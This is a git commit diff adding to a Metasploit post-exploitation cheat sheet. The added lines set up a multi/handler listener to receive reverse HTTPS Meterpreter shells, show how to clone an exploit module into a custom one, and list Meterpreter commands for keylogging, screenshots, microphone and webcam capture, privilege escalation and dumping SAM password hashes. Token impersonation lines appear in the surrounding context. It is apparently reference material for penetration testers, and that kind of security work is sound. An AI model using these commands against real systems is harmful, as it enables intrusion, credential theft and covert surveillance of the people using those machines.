adding what needs to be in here

OlivierLaflamme · web-flow · commit 83a73a4d4b13 · 2019-10-11T10:17:19.000-04:00
diff --git a/Cheatsheet_MSFPostExploitation.txt b/Cheatsheet_MSFPostExploitation.txt
@@ -23,4 +23,39 @@ meterpreter > wdigest
 meterpreter > use incognito
 meterpreter > list_tokens -u
 meterpreter > impersonate_token SERV-2K3\\Administrator
-execute -f cmd.exe -i -t
+execute -f cmd.exe -i -t
+
+Metasploit Exploit Multi Handler
+
+multi/handler to accept an incoming reverse\_https\_meterpreter
+
+        `payload
+        use exploit/multi/handler
+        set PAYLOAD windows/meterpreter/reverse_https
+        set LHOST $ip
+        set LPORT 443
+        exploit
+        [*] Started HTTPS reverse handler on https://$ip:443/`
+
+Building Your Own MSF Module
+
+        `mkdir -p ~/.msf4/modules/exploits/linux/misc
+        cd ~/.msf4/modules/exploits/linux/misc
+        cp
+        /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
+        ./crossfire.rb
+        nano crossfire.rb`
+
+Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
+
+        `download` Download a file or directory
+        `upload` Upload a file or directory
+        `portfwd` Forward a local port to a remote service
+        `route` View and modify the routing table
+        `keyscan_start` Start capturing keystrokes
+        `keyscan_stop` Stop capturing keystrokes
+        `screenshot` Grab a screenshot of the interactive desktop
+        `record_mic` Record audio from the default microphone for X seconds
+        `webcam_snap` Take a snapshot from the specified webcam
+        `getsystem` Attempt to elevate your privilege to that of local system.
+        `hashdump` Dumps the contents of the SAM database
